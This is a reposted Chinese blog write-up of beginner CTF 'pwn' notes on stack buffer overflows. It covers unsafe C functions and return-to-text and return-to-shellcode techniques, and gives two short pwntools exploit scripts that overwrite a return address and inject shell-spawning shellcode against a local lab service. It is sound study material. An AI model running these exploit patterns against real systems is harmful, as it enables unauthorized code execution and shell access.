Pwn_5 Stack Overflow

最新推荐文章于 2025-09-08 20:16:49 发布

weixin_30402085

最新推荐文章于 2025-09-08 20:16:49 发布

阅读量323

点赞数

CC 4.0 BY-SA版权

文章标签： shell

原文链接：http://www.cnblogs.com/rookieDanny/p/8460353.html

本文详细介绍了缓冲区溢出攻击原理及防御方法，包括如何利用StackOverflow漏洞通过覆盖返回地址来控制程序执行流程，以及如何使用工具定位并利用这些漏洞。

Buffer Overflow

因为程序本身没有正确检查输入数据的大小，造成攻击者可以输入比buffer还要大的数据，使得超出部分覆盖程序的其他部分，影响程序执行。

Stack Overflow

利用方式简单，可以直接覆盖return address和控制参数

Vunlnerable Function

gets
scanf
strcpy
sprintf
memcpy
strcat

Return to Text

控制程序的返回地址到原本程序中的函数（代码）

例如有类似的function,就可以直接跳转到这个function，function的地址可以用过IDA Pro或者objdump来查找

system(‘/bin/sh’) //很少
execve(‘/bin/sh’,NULL,NULL)

Return to Shellcode

覆盖返回地址
跳转到func或者shell

要做的事情

1.确定偏移地址offest

2.ret->shell

多输入，如果报了段错误说明有溢出点

偏移地址是32

函数地址

0x804851D

一个脚本

from pwn import *
r = remote ('127.0.0.1',4000) #connect

r.sendline('a'*32 +p32(0x804851D) ) #offset + ret

r.interactive()

丢进IDA看伪代码

双击name,name是一个未初始化的全局变量，在bss段中,这是一种关键信息。地址为0x0804A060，不改变

from pwn import *
r = remote ('127.0.0.1',4000) #connect

r.recvuntil('Name:')

r.sendline(asm(shellcraft.sh()) ) #offset + ret

r.recvuntil('Try your best: ')

r.sendline('a'*32+p32(0x0804A060))

r.interactive() # interact

返回地址改为全局变量的地址

转载于:https://www.cnblogs.com/rookieDanny/p/8460353.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30402085

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

stack overflow ROP

我多么希望明天有太阳，来灼烧我腐烂的梦想

09-05

533

ROP: Return Oriented Programming CTFs -fno-stack-protector 指的是不开启堆栈溢出保护，即不生成 canary。 checksec stack_example Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found N...

linux_pwn0x02_overflow

insomnia的博客

06-18

383

没有源程序，ida查看，发现整个程序非常精简，完全使用int 80h的系统中断实现命令。 char start() { char result; // al result = 3; __asm { int 80h; //LINUX - sys_write int 80h; //LINUX - } return result; } 汇编部分...

参与评论您还未登录，请先登录后发表或查看评论

2018网（PWN）鼎杯第一场解题记录（Writeup）

SWEET0SWAT的博客

08-21

1万+

MISC clip 使用十六进制查看软件打开，查找的过程中发现有idat头：还有一处在下方，表示还有另一张图片但是这里缺少头部需要手动补充上去再另存文件：一共提取出两张图片，但是图片明显被处理过了其实不明白出题人为什么要弄成这样，CTF比赛还要弄成这样纯粹就是刁难，弄得眼睛贼疼。 minified...

南京邮电大学CTF-PWN-Stack Overflow

WocW的博客

12-21

1525

经过双月赛，通过阅读同级人的WriteUp结合参赛的亲身体验。深深感觉到自己文字表达能力的欠缺，以及技术上的差距。但能意识到差距是好事，意识到了就努力去弥补。一直想要学习PWN，一拖再拖，终于开始了。关于write up,老师说了一句话，印象深刻。“write up 是写给别人看的，不是你自己看懂了就行。” 进入正题: 把文件拖入IDA，进入main函数F5反编译，先看程序流程。 set...

Linux系统调用 int 80h int 0x80

热门推荐

xiaominthere的专栏

12-12

2万+

在网上找了好一会儿才找到，自己整理一下，也方便以后查看。参考网址： http://zh.wikipedia.org/wiki/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8 http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html 1.系统调用在计算机中，系统调用（英语：sy

PWN入门之Stack Overflow

2401_84434570的博客

05-06

1111

看一下正常情况，如果是正常情况的话，会返回到main函数中，这里需要注意一个细节，EIP这个寄存器，计算机会执行EIP指向的东西。根据这个原理，就可以进行构造，当ret的时候，EIP指向的东西为success函数的地址即可，这样就可以调用success函数了，从而达到劫持程序流的目的。在本篇文章中，我详细介绍了如何利用程序中本身存在的栈溢出漏洞，达到劫持程序流的目的，进而实现system("/bin/sh")的效果，如果你也对这个知识点感兴趣，欢迎阅读全文，内容篇幅较长，阅读时长约12分钟。

(ARM PWN里的thumb模式和arm模式的切换)root_me_stack_buffer_overflow_basic

seaaseesa的博客

07-24

625

(ARM PWN里的thumb模式和arm模式的切换)root_me_stack_buffer_overflow_basic 首先，检查一下程序的保护机制然后，我们用IDA分析一下，栈溢出漏洞在CSU里面有可以利用的gadget，但是直接ret过去，会报invalid instrument错误。这是由于在csu这里的指令是thumb指令，需要将cpu工作状态转移到thumb指令状态才可以执行。标记ARM状态是用CPSR寄存器中的标志位T， BX指令可以设置T位，当BX后面的地

CG-CTF Stack Overflow（pwn）

苗_的博客

02-24

836

首先先拿到ida里面看一下，找一下溢出点点进去A发现是一个大小为40的数组（0x28），但是可以接受64个字符，所以这里是第一个溢出点。下面是对s进行输入，限制是n，点开n会发现n就在A的下面。所以思路就是：我们可以通过溢出A来达到覆盖n的效果然后我们点开pwnme函数会发现system函数，搜索字符串发现没有‘/bin/sh’，所以需要我们自己写入bss段。 exp： f...

攻防世界pwn题目int_overflow

03-08

### 关于CTF PWN Int Overflow Challenge Solution 在处理PWN类型的整数溢出挑战时，理解程序如何处理输入以及这些输入怎样影响内存至关重要。当遇到名为`int_overflow`的题目时，这可能意味着某个`int`型变量存在...

CTF|pwn栈溢出题目int_overflow解题思路及个人总结

skyattractive的博客

05-31

2548

CTF|pwn栈溢出题目int_overflow解题思路及个人总结解题思路拿到题目，标题是int_overflow 指可能是某个int型变量存在栈溢出，留意下老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下简单的选择登陆输入账号密码返回结果拖入IDA 反编译查看main函数进入login函数 login中定义两个变量buf和s，所给的栈的大小都很大，不存在栈溢出我们继续进入check_passwd函数这个函数只要

攻防世界——pwn（1）

weixin_44319142的博客

04-08

2950

get_shell

BugkuCTF pwn overflow2

ChaoYue_miku的博客

07-04

1607

** 0、尝试打开文件，使用checksec检查保护情况 ** ** 1、使用IDA 64 Pro打开文件 ** read()函数存在栈溢出，查看栈结构 ** 2、构造rop链 ** Shitf+F12查找字符串发现/bin/sh的地址是0x402004 system函数的地址是0x401050 64位程序的第一个参数在 rdi 寄存器里使用ROPgadget工具寻找汇编指令 rdi寄存器地址：0x40126b ** 3、构造exp ** from pwn import * r = remo

Linux 中 export 命令用法总结

核电子探索者

09-04

1360

Linux中的export命令用于将变量导出为环境变量，使其能被当前Shell及其子进程访问。局部变量仅限当前Shell，而环境变量可跨进程传递。基本语法包括export 变量名=值（一步导出）或先定义再export（两步）。常用场景包括：临时设置环境变量（如PATH）、导出函数供子进程调用、取消导出（export -n）及查看环境变量（export -p）。持久化需将export命令写入~/.bashrc（用户级）或/etc/profile（系统级）。注意事项：带空格的值需引号包裹，子进程修改不影响父进程

STM32 - Embedded IDE - GCC - rt_thread_nano的终端msh＞不工作的排查与解决

最新发布

wallace89的博客

09-08

506

RT-Thread的MSH终端正常工作依赖链接脚本中的关键段定义。FSymTab和VSymTab段保存了shell命令的符号表，而.rti_fn*段则处理系统自动初始化函数。当链接脚本缺失这些段定义时，会导致符号表丢失和初始化失败，表现为MSH终端无法识别命令。解决方法是在链接脚本中明确保留这些段，并定义相应的边界符号（如__fsymtab_start/end），确保RT-Thread能正确加载命令和完成初始化。这两部分缺一不可，共同保障了RT-Thread系统的正常运行。

Shell 秘典（卷九）—— Linux系统中配置邮箱的发送功能

qq_41978931的博客

09-07

1162

本文详细介绍了在Linux系统中配置QQ邮箱发送功能的步骤，包括465和587两种SMTP端口的配置方法。主要内容涵盖：1）环境准备，安装mailx工具和证书管理工具；2）QQ邮箱SMTP服务开启和授权码获取；3）NSS证书数据库的创建与初始化；4）465端口（SSL加密）和587端口（STARTTLS）的具体配置；5）邮件发送测试和常见故障排除。通过本文指导，可实现Linux系统与QQ邮箱的安全连接，为服务器监控报警提供可靠的邮件通知功能。

bash:trtexec:command not found

qq_40725313的博客

09-08

130

环境变量未配置：若 TensorRT 已安装，但 trtexec 所在路径未添加到系统的 PATH 环境变量中，系统就无法找到该命令。trtexec 一般位于 TensorRT 安装目录的 bin 文件夹下（例如 /usr/src/tensorrt/bin）。若要永久生效，可将该命令添加到 ~/.bashrc 或 ~/.zshrc（根据使用的 shell）文件中，然后执行。下面忽略即可，只是为了检验tensorrt的位置是否在/usr/src/tensorrt。

CamX-Camera常用编译命令和adb指南

justXiaoSha的博客

09-07

设置屏幕dpi （常用的dpi有160mdpi, 240hdpi, 320xhdpi, 480xxhdpi）开串口： setprop log.tag.xtc_enable_serial_log 1。关串口： setprop log.tag.xtc_enable_serial_log 0。先用python把xml编译相关bin到out目录,然后再全编译就可以生效了。默认：adb shell wm size 360x320。编译：点击图标，填写bin文件名。配置ok后，如下图标会点亮。重置可用dpi如下命令。

【shell编程】之shell脚本基础（中）

zzh_wj的博客

09-04

623

本文介绍了Shell脚本中的流程控制语句，包括条件选择和循环结构。重点讲解了case语句的格式和使用场景，通过工作选项案例展示其应用；详细说明了for循环和while循环的语法结构及执行机制，并提供了99乘法表打印和工作选项等实际案例。其中，case语句通过模式匹配执行命令，for循环遍历列表元素，while循环基于条件判断执行循环体。文章还介绍了如何通过$0实现递归循环和无限循环的实现方式，为Shell脚本编程提供了实用的流程控制方法。